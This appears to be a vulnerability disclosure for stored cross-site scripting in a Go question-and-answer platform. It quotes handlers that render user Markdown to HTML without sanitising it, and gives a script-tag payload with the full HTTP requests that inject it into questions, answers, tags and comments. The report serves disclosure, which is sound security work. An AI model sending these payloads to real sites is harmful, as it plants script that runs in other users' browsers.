The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Posting the Question:
func (req *QuestionAdd) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
for _, tag := range req.Tags {
if len(tag.OriginalText) > 0 {
tag.ParsedText = converter.Markdown2HTML(tag.OriginalText)
}
}
return nil, nil
}
Updating the Question:
func (req *QuestionUpdate) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
return nil, nil
}
Posting the Answer:
func (req *AnswerAddReq) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
return nil, nil
}
Updating the Answer:
func (req *AnswerUpdateReq) Check() (errFields []*validator.FormErrorField, err error) {
req.HTML = converter.Markdown2HTML(req.Content)
return nil, nil
}
Updating the Tag:
func (r *UpdateTagReq) Check() (errFields []*validator.FormErrorField, err error) {
if len(r.EditSummary) == 0 {
r.EditSummary = "tag.edit.summary"
}
r.ParsedText = converter.Markdown2HTML(r.OriginalText)
return nil, nil
}
Addning a comment:
func (req *AddCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
req.ParsedText = converter.Markdown2HTML(req.OriginalText)
return nil, nil
}
Updating a Comment:
func (req *UpdateCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
req.ParsedText = converter.Markdown2HTML(req.OriginalText)
return nil, nil
}
Payload:
<script>alert(1)<\\x00/script>
<style></style><img src />
Request @ Question:
POST /answer/api/v1/question HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 213
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/ask
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"title":"question","content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />","tags":[{"original_text":"","parsed_text":"","slug_name":"nano","recommend":false,"reserved":false}]}
Request @ Answer:
POST /answer/api/v1/post/render HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 95
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000007
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />\n"}
Request @ Tag:
PUT /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 272
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/tags/10030000000000002/edit
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"display_name":"a","slug_name":"a","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />","parsed_text":"<style></style><img src /><blockquote>\n</blockquote>\n","tag_id":"10030000000000002","edit_summary":""}
Request @ Comment:
POST /answer/api/v1/comment HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 1d798f13-bda1-11ed-9586-0242ac110002
Content-Type: application/json
Content-Length: 158
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000012/nadahh
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"object_id":"10020000000000015","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src />","mention_username_list":[]}